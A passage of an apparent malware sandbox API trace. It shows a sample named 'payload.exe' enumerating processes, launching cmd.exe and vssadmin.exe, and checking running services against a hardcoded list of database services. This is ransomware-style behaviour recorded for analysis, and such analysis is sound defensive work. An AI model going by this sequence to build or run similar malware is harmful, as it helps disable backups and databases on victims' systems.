lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0050.638] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0050.638] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0050.639] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0050.639] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0050.640] lstrlenW (lpString="til ear equal.exe") returned 17 [0050.640] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0050.640] lstrlenW (lpString="itunes-bring.exe") returned 16 [0050.640] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0050.897] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0050.900] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0050.914] lstrlenW (lpString="philadelphia.exe") returned 16 [0050.914] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0050.915] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0050.915] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0050.915] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0050.915] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0050.916] lstrlenW (lpString="fraud stuck.exe") returned 15 [0050.916] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0050.917] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0050.917] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0050.918] lstrlenW (lpString="attended.exe") returned 12 [0050.918] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0050.918] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0050.918] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0050.919] lstrlenW (lpString="pan physician.exe") returned 17 [0050.919] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0050.920] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0050.920] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0050.920] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0050.920] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0050.921] lstrlenW (lpString="over-celebrity.exe") returned 18 [0050.921] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.922] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0050.922] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0050.922] lstrlenW (lpString="payload.exe") returned 11 [0050.922] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0050.923] lstrlenW (lpString="cmd.exe") returned 7 [0050.923] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0050.924] lstrlenW (lpString="conhost.exe") returned 11 [0050.924] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0050.924] lstrlenW (lpString="vssadmin.exe") returned 12 [0050.925] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0050.925] lstrlenW (lpString="VSSVC.exe") returned 9 [0050.925] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.926] lstrlenW (lpString="svchost.exe") returned 11 [0050.926] Process32NextW (in: hSnapshot=0x1d0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0050.926] CloseHandle (hObject=0x1d0) returned 1 [0050.927] Sleep (dwMilliseconds=0x1f4) [0051.616] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626d20 [0051.643] EnumServicesStatusExW (in: hSCManager=0x626d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0051.647] GetLastError () returned 0xea [0051.647] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x628500 [0051.647] EnumServicesStatusExW (in: hSCManager=0x626d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x628500, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x628500, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0051.648] CloseServiceHandle (hSCObject=0x626d20) returned 1 [0051.648] lstrlenW (lpString="Appinfo") returned 7 [0051.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0051.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0051.648] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0051.648] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0051.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0051.648] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0051.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.648] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0051.648] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0051.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0051.648] lstrlenW (lpString="AudioSrv") returned 8 [0051.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0051.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0051.648] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0051.648] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0051.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0051.648] lstrlenW (lpString="BFE") returned 3 [0051.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0051.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0051.648] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0051.648] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0051.649] lstrlenW (lpString="CryptSvc") returned 8 [0051.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0051.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0051.649] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0051.649] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0051.649] lstrlenW (lpString="CscService") returned 10 [0051.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0051.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0051.649] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0051.649] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0051.649] lstrlenW (lpString="DcomLaunch") returned 10 [0051.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.649] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0051.649] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0051.649] lstrlenW (lpString="Dhcp") returned 4 [0051.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0051.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0051.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0051.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0051.649] lstrlenW (lpString="Dnscache") returned 8 [0051.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0051.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0051.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0051.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0051.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0051.649] lstrlenW (lpString="DPS") returned 3 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0051.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0051.650] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0051.650] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0051.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0051.650] lstrlenW (lpString="eventlog") returned 8 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0051.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0051.650] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0051.650] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0051.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0051.650] lstrlenW (lpString="EventSystem") returned 11 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0051.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0051.650] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0051.650] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0051.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0051.650] lstrlenW (lpString="gpsvc") returned 5 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0051.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0051.650] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0051.650] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0051.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0051.650] lstrlenW (lpString="iphlpsvc") returned 8 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.650] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0051.650] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0051.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0051.650] lstrlenW (lpString="LanmanServer") returned 12 [0051.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0051.651] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0051.651] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0051.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0051.651] lstrlenW (lpString="LanmanWorkstation") returned 17 [0051.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.651] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0051.651] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0051.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0051.651] lstrlenW (lpString="lmhosts") returned 7 [0051.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0051.651] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0051.651] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0051.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0051.651] lstrlenW (lpString="MMCSS") returned 5 [0051.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0051.651] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0051.651] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0051.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0051.651] lstrlenW (lpString="MpsSvc") returned 6 [0051.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0051.651] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0051.651] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0051.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0051.651] lstrlenW (lpString="Netman") returned 6 [0051.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0051.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0051.652] lstrlenW (lpString="netprofm") returned 8 [0051.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0051.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0051.652] lstrlenW (lpString="NlaSvc") returned 6 [0051.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0051.652] lstrlenW (lpString="nsi") returned 3 [0051.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0051.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0051.652] lstrlenW (lpString="PcaSvc") returned 6 [0051.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0051.652] lstrlenW (lpString="PlugPlay") returned 8 [0051.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0051.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0051.652] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0051.652] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0051.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0051.653] lstrlenW (lpString="Power") returned 5 [0051.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0051.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0051.653] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0051.653] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0051.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0051.653] lstrlenW (lpString="ProfSvc") returned 7 [0051.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0051.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0051.653] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0051.653] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0051.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0051.653] lstrlenW (lpString="RpcEptMapper") returned 12 [0051.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.653] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0051.653] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0051.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0051.653] lstrlenW (lpString="RpcSs") returned 5 [0051.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0051.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0051.653] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0051.653] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0051.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0051.653] lstrlenW (lpString="SamSs") returned 5 [0051.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0051.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0051.653] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0051.653] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0051.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0051.653] lstrlenW (lpString="Schedule") returned 8 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0051.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0051.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0051.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0051.654] lstrlenW (lpString="SENS") returned 4 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0051.654] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0051.654] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0051.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0051.654] lstrlenW (lpString="ShellHWDetection") returned 16 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.654] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0051.654] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0051.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0051.654] lstrlenW (lpString="Spooler") returned 7 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0051.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0051.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0051.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0051.654] lstrlenW (lpString="swprv") returned 5 [0051.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0051.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0051.654] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0051.654] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0051.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0051.654] lstrlenW 